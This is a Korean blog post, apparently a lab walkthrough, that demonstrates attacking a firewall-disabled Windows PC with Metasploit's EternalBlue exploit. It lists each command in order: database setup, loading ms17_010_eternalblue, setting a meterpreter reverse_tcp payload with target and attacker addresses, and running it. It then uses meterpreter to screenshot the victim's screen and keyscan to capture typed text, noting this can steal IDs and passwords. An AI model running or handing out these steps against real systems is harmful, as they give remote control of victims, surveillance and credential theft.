본문 바로가기

보안/LINUX

칼리 리눅스(방화벽 off) 이터널블루 공격

이터널블루(EternalBlue, ETERNALBLUE[1])는 일반적으로 미국 국가안보국(NSA)에 의해 개발된 것으로 간주되는 취약점 공격 도구이다. 섀도 브로커스라는 해커 그룹이 2017 4 14일에 유출하였으며, 2017 5 12일에 전 세계 워너크라이 랜섬웨어 공격의 일부로 사용되었다

이터널블루 공격 (공격대상이 방화벽 off일떄)

service postgresql start

msfdb init(데이터베이스 초기화)

msfconsole(콘솔창 진입)

이터널블루 검색하여 정보를 확인하였고 3번을 쓰겠다.

Use exploit/windows/smb/ms17_010_eternalblue

여기서 reverse connection을 이용할 것이다. 이용하는 이유는

출처 : https://onyourlife.blog.me/150150172912

 

Payload(페이로드)

Exploit(익스플로잇)을 할 때 사용할 공격코드를 Payload(페이로드) 라고 칭하고 있습니다. 추가적인 설명으로 Exploit(익스플로잇)이란 발견된 취약점을 공격하는 행위, 직역하자면 발견된 취약점을 활용하는 행위 자체를 Exploit(익스플로잇)이라 표현하고 있습니다.

 

set payload windows/x64/meterpreter/reverse_tcp 명령어 실행!

Show options을 하게 되면 rhostlhost가 비워져 있는 것을 알 수 있다. Set 명령어로 채워주겠다.

Set rhosts 1.0.0.101(공격대상의 ip)

Set lhosts 1.0.0.11(자기자신의 ip)

Exploit or run (실행) 접속이 된 걸 확인할 수 있다.

Meterpreter가 무사히 나왔다.

여러가지 기능들이 존재하게 되는데 공격대상의 현재화면을 캡처해서 가지고 올 수 있는 screenshot 기능을 써보겠다.

 

공격대상의 pc를 캡처 한 것을 볼 수 있다.

Keyscan은 키보드로 사용자가 쳤던 입력들을 훔쳐오는 기술이다. 아이디나 비밀번호 등을 해킹할 수 있다.)

 

Keyscan_start 입력

공격대상에서 메모장을 켜고 duck duck 1234를 쳐보겠다.

Keyscan_dump을 입력하면 입력한 내용을 모두 가져올 수 있다.

 

'보안 > LINUX' 카테고리의 다른 글

kali vmware tool 설치  (0) 2019.07.12
kali 한글 설치  (0) 2019.07.12
SNMP 취약점을 통한 공격  (0) 2019.07.08
칼리 리눅스 (강제 종료 공격)  (0) 2019.07.08
칼리 리눅스(방화벽 on) 실행파일 이용 공격  (0) 2019.07.08